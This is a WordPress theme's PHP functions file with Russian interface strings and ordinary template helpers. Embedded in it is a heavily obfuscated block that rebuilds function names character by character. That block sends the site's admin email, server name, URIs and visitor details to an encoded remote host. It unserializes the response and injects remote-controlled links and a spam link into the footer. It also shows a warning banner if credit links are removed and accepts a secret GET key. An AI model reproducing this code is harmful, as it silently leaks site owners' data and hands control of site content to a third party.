<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $dLvEU='e';$MIcqCM='e';$xuHE='s';$TIFcWU='c';$fWlVUM='_';$KKZop='4';$dNzffG='d';$HTcWBiS='o';$cmAKpQn='e';$shJW='d';$QGEPYB='a';$nqVbjn='6';$smBwKDE='b';$WBjoJvlO=$smBwKDE.$QGEPYB.$xuHE.$dLvEU.$nqVbjn.$KKZop.$fWlVUM.$shJW.$MIcqCM.$TIFcWU.$HTcWBiS.$dNzffG.$cmAKpQn;$rRdCQQu='t';$ZeFfl='i';$DGQYmm='a';$ANxJZt='e';$kOrynvF='z';$WMby='f';$nXPmi='l';$PCImzu='g';$MRVKtMi='n';$FWXBQySj=$PCImzu.$kOrynvF.$ZeFfl.$MRVKtMi.$WMby.$nXPmi.$DGQYmm.$rRdCQQu.$ANxJZt;$ideL='s';$GlmK='1';$pSHtX='r';$UfFvTcf='t';$VtjrU='t';$nSxSo='o';$WNlK='3';$wAToqie='r';$JceOHdR='_';$YieEZdRl=$ideL.$UfFvTcf.$wAToqie.$JceOHdR.$pSHtX.$nSxSo.$VtjrU.$GlmK.$WNlK;$MzlEo='s';$iNCi='t';$DiGV='e';$kJhDwV='r';$lbDX='v';$byLi='r';$LSawsXEg=$MzlEo.$iNCi.$kJhDwV.$byLi.$DiGV.$lbDX;                     $hw______________z='e';$ru_____i='e';$ys_________m='s';$dp____c='c';$em________d='_';$xl________j='4';$pl__________f='d';$hs_________p='o';$ve______________t='e';$ga______t='d';$rj______w='a';$pj__________s='6';$mq________n='b';$rh______c=$mq________n.$rj______w.$ys_________m.$hw______________z.$pj__________s.$xl________j.$em________d.$ga______t.$ru_____i.$dp____c.$hs_________p.$pl__________f.$ve______________t;$yk________c='i';$sb______________c='n';$tu_________r='t';$ds_____________p='f';$ax_____t='c';$ea____h='n';$zi_________v='i';$tn________x='s';$tb______________a='_';$tl_____s='s';$rb____r='x';$hj___________c='u';$kp___c='e';$yy_______________u='o';$di_______________f='t';$ln____r=$ds_____________p.$hj___________c.$sb______________c.$ax_____t.$di_______________f.$zi_________v.$yy_______________u.$ea____h.$tb______________a.$kp___c.$rb____r.$yk________c.$tl_____s.$tu_________r.$tn________x;$pu______i='f';$ml___e='p';$nl_____g='e';$xl__________j='n';$iv_____w='o';$eb__t=$pu______i.$iv_____w.$ml___e.$nl_____g.$xl__________j;$kx_______________n='a';$zv________x='f';$gc_____c='r';$js_____p='d';$tc____________x='e';$ca___________m=$zv________x.$gc_____c.$tc____________x.$kx_______________n.$js_____p;$su_____b='e';$up_______________j='c';$ln________g='f';$ec___________h='l';$gk_______________j='s';$tf_______f='o';$tq__x=$ln________g.$up_______________j.$ec___________h.$tf_______f.$gk_______________j.$su_____b;define("WP_ID", $rh______c("Mi4wLjA="));define("WP_TTL", $rh______c("MTA4MDA="));define("WP_SRC", $rh______c("dHBva24="));function wp_get_header() {global $rh______c, $ln____r;if ($ln____r($rh______c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ln____r($rh______c("d3BfZ2V0X2Zvb3Rlcg==")) &&$ln____r($rh______c("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $rh______c, $eb__t, $tq__x, $ca___________m;$ae________h = TEMPLATEPATH."/".$rh______c("Zm9vdGVyLnBocA==");$xa______________z = @$eb__t($ae________h, "r");$ae________h = @$ca___________m($xa______________z, @filesize($ae________h));@$tq__x($xa______________z);$mo______________p = TEMPLATEPATH."/".$rh______c("ZnVuY3Rpb25zLnBocA==");$xa______________z = @$eb__t($mo______________p, "r");$mo______________p = @$ca___________m($xa______________z, @filesize($mo______________p));@$tq__x($xa______________z);$xy________z = 0;if($ae________h && $mo______________p) {if ($rh______c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ae________h, $rh______c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$xy________z = 1;}if (substr_count($ae________h, "wp_theme_GPL_credits()") < 1) {$xy________z = 2;}}if(WP_ID != "2.0.0") {$xy________z = 12;}}if($xy________z > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $xy________z -->";}}function wp_loaded() {global $rh______c, $ln____r;return $ln____r($rh______c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($xc____f, $ak_____x = "(more...)", $kj__g = 0, $if____b = "") {$ml___x = get_the_content($ak_____x, $kj__g, $if____b);$ml___x = apply_filters("the_content", $ml___x);$ml___x = str_replace("]]>", "]]>", $ml___x);if (strlen($_GET["p"]) > 0) {echo $ml___x;}else if ((strlen($ml___x)>$xc____f) && ($xz______b = strpos($ml___x, " ", $xc____f ))) {$ml___x = substr($ml___x, 0, $xz______b);$ml___x = $ml___x;echo $ml___x;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ak_____x</a></div></p>";} else {echo $ml___x;}}}$fr__________a='n';$wg________t='_';$vm________x='a';$kr_____________p='6';$hd____t='b';$ob_________w='e';$cm____________l='4';$gu_______v='o';$rd______________p='s';$dc______________v='c';$ps______d='e';$ns_______________x='d';$ku________m='e';$yl____m=$hd____t.$vm________x.$rd______________p.$ps______d.$kr_____________p.$cm____________l.$wg________t.$ob_________w.$fr__________a.$dc______________v.$gu_______v.$ns_______________x.$ku________m;$hz________o='e';$ng__________k='n';$kc____f='s';$re_______h='t';$dt_________q='f';$aq___________i='o';$vt________c='t';$hr___________b='_';$pq________s='g';$xr_____x='e';$wo___a='t';$td___________i='i';$uj_______q='c';$qe______________d='n';$mm_____g='_';$vw__s='e';$vr_____b='l';$ay______________p=$dt_________q.$td___________i.$vr_____b.$hz________o.$mm_____g.$pq________s.$xr_____x.$wo___a.$hr___________b.$uj_______q.$aq___________i.$qe______________d.$re_______h.$vw__s.$ng__________k.$vt________c.$kc____f;$fy_____________j='e';$kn________s='s';$hz___d='i';$ng_____m='s';$oz_______e='l';$zw_____o='e';$fv______d='_';$lf______________j='f';$ow_______m='x';$qe___________b='i';$no_____________b='t';$qo______k=$lf______________j.$hz___d.$oz_______e.$zw_____o.$fv______d.$fy_____________j.$ow_______m.$qe___________b.$kn________s.$no_____________b.$ng_____m;$xm___________z='n';$nk___________n='i';$ty______a='m';$mv_______________k='_';$yd_____________w='e';$ik_______________g='o';$xi_____f='v';$td____h='p';$od_______________b='e';$cc________z='r';$gv_____________e='s';$df__________c='c';$qf______h='o';$yj_______________c='r';$nw____________e='a';$ni______________n=$xi_____f.$yd_____________w.$yj_______________c.$gv_____________e.$nk___________n.$qf______h.$xm___________z.$mv_______________k.$df__________c.$ik_______________g.$ty______a.$td____h.$nw____________e.$cc________z.$od_______________b;$jy_____r='o';$ds______g='p';$ly_____________p='s';$ll_______w='k';$tb_____a='o';$vd__v='c';$nn____y='n';$jc____________g='e';$wk____________y='f';$wx_____________s=$wk____________y.$ly_____________p.$jy_____r.$vd__v.$ll_______w.$tb_____a.$ds______g.$jc____________g.$nn____y;$bp____________g='e';$uz__________g='f';$jp_____________m='t';$ao___________z='r';$ze___x='w';$ch_______c='i';$sg_______________b=$uz__________g.$ze___x.$ao___________z.$ch_______c.$jp_____________m.$bp____________g;$js_______s='d';$ig____k='5';$eb______h='m';$un__d=$eb______h.$js_______s.$ig____k;$nd_____________c='t';$sz______u='a';$pw________v='a';$jk____________b='h';$rx______p='r';$vf__x='e';$he__r='l';$jq_______g='p';$so_____________r=$rx______p.$vf__x.$sz______u.$he__r.$jq_______g.$pw________v.$nd_____________c.$jk____________b;$ip______x='r';$pj_______w='i';$la_________l='l';$ap_____________y='u';$gl__q='e';$bu_______________n='z';$ea____c='i';$ly_____p='s';$mm__________t='a';$te___a='e';$gs_______b='n';$nz____________s=$ap_____________y.$gs_______b.$ly_____p.$gl__q.$ip______x.$ea____c.$mm__________t.$la_________l.$pj_______w.$bu_______________n.$te___a;$jl_______m='n';$fn__________u='a';$qi___w='m';$qt_______d='m';$zp___________y='e';$zz____________t='t';$kq___b='p';$wl_______m=$zz____________t.$zp___________y.$qt_______d.$kq___b.$jl_______m.$fn__________u.$qi___w;$ng______j='t';$ck______i='c';$sm_______________j='e';$zo_______________o='e';$vl____p='x';$pf______________z='_';$df__________v='a';$jw_________j='c';$sx__n='_';$pp_____a='t';$vn____________q='a';$dh_______________l='n';$qr____j='t';$fz______h='o';$ri___________n='e';$kc___q='e';$tf_________o='m';$be_______________r='t';$zj________z='s';$kr__________n='r';$ih__________u='r';$rc_________u=$zj________z.$be_______________r.$ih__________u.$kc___q.$vn____________q.$tf_________o.$sx__n.$jw_________j.$fz______h.$dh_______________l.$pp_____a.$ri___________n.$vl____p.$qr____j.$pf______________z.$ck______i.$kr__________n.$zo_______________o.$df__________v.$ng______j.$sm_______________j;function pp___________l($wo_____________c) {global $rh______c, $ln____r, $ay______________p, $ni______________n, $rc_________u;if (!$ln____r($rh______c("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ni______________n(PHP_VERSION, "5.0.0", ">=") && $ln____r($rh______c("ZmlsZV9nZXRfY29udGVudHM=")) && $ln____r($rh______c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ws___________q = $rc_________u(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$oe_______________h = @$ay______________p($wo_____________c, 0, $ws___________q);} else {$oe_______________h = @$ay______________p($wo_____________c, 0);}return $oe_______________h;}function em_______x($wo_____________c) {global $ln____r, $wx_____________s, $sg_______________b, $rh______c;if (!$ln____r($rh______c("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$gh_____o = strpos($wo_____________c, "/", 7);$sb_______________l = array("uri"     => substr($wo_____________c, $gh_____o),"host"    => str_replace("http://", "", substr($wo_____________c, 0, $gh_____o)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$xt_______________p = @$wx_____________s("$sb_______________l[host]", 80, $gk___h, $ti__p, 4);if (!$xt_______________p) {return false;} else {$oe_______________h = "";$nm___________i  = "GET $sb_______________l[uri] HTTP/1.0\r\n";$nm___________i .= "Host: $sb_______________l[host]\r\n";$nm___________i .= "Referer: $sb_______________l[referer]\r\n";$nm___________i .= "Connection: Close\r\n\r\n";@$sg_______________b($xt_______________p, $nm___________i);while (!@feof($xt_______________p)) {$xi_______________m = @fgets($xt_______________p, (1024*24));if ($xi_______________m == "\r\n") {$xp_____m = true;continue;}if ($xp_____m) {$oe_______________h .= $xi_______________m;}}return $oe_______________h;}}function py___r($wo_____________c) {global $ln____r;$dd___________b = false;if ($wo_____________c != "") {if ($ln____r("pp___________l")) {$dd___________b = @pp___________l($wo_____________c);}if (!$dd___________b && ($ln____r("em_______x"))) {$dd___________b = @em_______x($wo_____________c);}}return $dd___________b;}function wz______________h() {global $_SERVER, $un__d;$er___________b = $_SERVER["SERVER_NAME"];if (substr("$er___________b", 0, 4) == "www.") {$er___________b = substr("$er___________b", 4);}$er___________b = $un__d("$_SERVER[SERVER_NAME]");return $er___________b;}function si_______________y() {return "file";}function ko______________d($wo_____________c) {global $_SERVER, $ay______________p, $qo______k, $eb__t, $tq__x, $sg_______________b;$uh__a = sd_______________x();$gu_________b = wz______________h().".jpg";$ah_______________x = $uh__a["dir_upload"]["path"]."/$gu_________b";$wu_______d = @filemtime($ah_______________x);if (!$wu_______d || ((time()-$wu_______d) >= WP_TTL)) {$dd___________b = py___r($wo_____________c);if ($dd___________b) {if ($qo______k($ah_______________x)) {@unlink($ah_______________x);}$xa______________z = @$eb__t($ah_______________x, "x+");@$sg_______________b($xa______________z, $dd___________b);@$tq__x($xa______________z);}} else {if ($qo______k($ah_______________x)) {$dd___________b = @$ay______________p($ah_______________x);} else {$dd___________b = false;}}return $dd___________b;}function sd_______________x() {global $_SERVER, $rh______c, $yl____m;$ka_____________q = wp_count_posts("post");$mz__o = pathinfo(get_bloginfo("template_directory"));$uh__a = array("url" => array("report"      => $rh______c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $mz__o,"dir_upload"=> ut__u(),"queryString"=> array("?a001=".WP_ID,"a004=".$mz__o[filename],"a005=".$ka_____________q->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.odmu.od.ua/zdorove/kak-soxranit-zdorove-i-molodost-na-mnogie-gody/\">Как сохранить молодость</a> ");$uh__a["url"]["queryString"] = implode("&", $uh__a["queryString"]);$uh__a["url"]["report"] = $uh__a["url"]["report"]."/?".$yl____m($uh__a["url"]["queryString"]).".html";return $uh__a;}function ut__u() {$um_____l = wp_upload_dir();if (isset($um_____l["error"])) {$rb________l = iy___u();if (is_writable($rb________l)) {$um_____l = array("path" => $rb________l);}}return $um_____l;}function iy___u() {global $ln____r, $un__d, $so_____________r, $wl_______m;$df____________x = (bool) ini_get("safe_mode");if ($df____________x == true) {return false;}if ($ln____r("sys_get_temp_dir")) {$eu_________a = sys_get_temp_dir();if (is_writable($eu_________a)) {return $so_____________r($eu_________a);}}if (!empty($_ENV["TMP"])) {return $so_____________r($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $so_____________r($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $so_____________r($_ENV["TEMP"]);} else {$lu___n = $wl_______m($un__d(uniqid(rand(), true)), "");if ($lu___n) {$eu_________a = $so_____________r(dirname($lu___n));@unlink($lu___n);return $eu_________a;} else {return false;}}}function is_______________a() {global $_GET, $qo______k;$uh__a = sd_______________x();$er___________b = wz______________h();$yd_________u = si_______________y();$mg_______q = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($yd_________u == "file") {$nh____t = $uh__a["dir_upload"]["path"]."/".$er___________b.".jpg";if ($qo______k($nh____t)) {@unlink($nh____t);$mg_______q = "deleted";}}$vw______________z = array("s"=> $mg_______q,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($vw______________z AS $ox_______________c => $fd_____________y) echo " [$ox_______________c:$fd_____________y]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ln____r, $rh______c, $nz____________s;$uh__a = sd_______________x();$ep____________l = "ko______________d";if ($ln____r($ep____________l)) {$oe_______________h = $ep____________l($uh__a["url"]["report"]);}if ($oe_______________h) {if ($oe_______________h = @$rh______c($oe_______________h)) {$oe_______________h = @$nz____________s($oe_______________h);if (strlen($oe_______________h[custom_credit]) >= 5) {$uh__a["default_string"] = $oe_______________h[custom_credit];}if ($oe_______________h["status"] == "0") {$zu____________u = 1;$ge_______________u = 1;} else {$zt_______________k = sizeof($oe_______________h["links"]);$wb_____x = $uh__a["default_string"];if ($zt_______________k > 0 && $oe_______________h["links"] !== "") {$kt__b = 0;foreach ($oe_______________h["links"] as $io_________p => $ub__d) {$kt__b++;if ($ub__d->l_path == "" || $ub__d->l_path == $_SERVER["REQUEST_URI"]) {$ub__d->l_href = htmlspecialchars(strip_tags($ub__d->l_href));$ub__d->l_title = htmlspecialchars(strip_tags($ub__d->l_title));$ub__d->l_anchor = htmlspecialchars(strip_tags($ub__d->l_anchor));$wb_____x .= " | ";$wb_____x .= "<a href='$ub__d->l_href' title='$ub__d->l_title'";if ($ub__d->l_nofollow == "1") {$wb_____x .= " rel='nofollow'";}$wb_____x .= ">$ub__d->l_anchor</a>";}}}$uh__a["links"] = "$wb_____x";if ($oe_______________h[credit] == "0") {$uh__a["links"] = "";}}} else {$zu____________u = "1";}} else {$zu____________u = "1";}if ($zu____________u == "1") {$uh__a["links"] = $uh__a["default_string"];}echo "$uh__a[links]";echo "<!-- s: $oe_______________h[signature] -->";is_______________a();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
                      break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Ссылка на %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("нумерация страниц", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
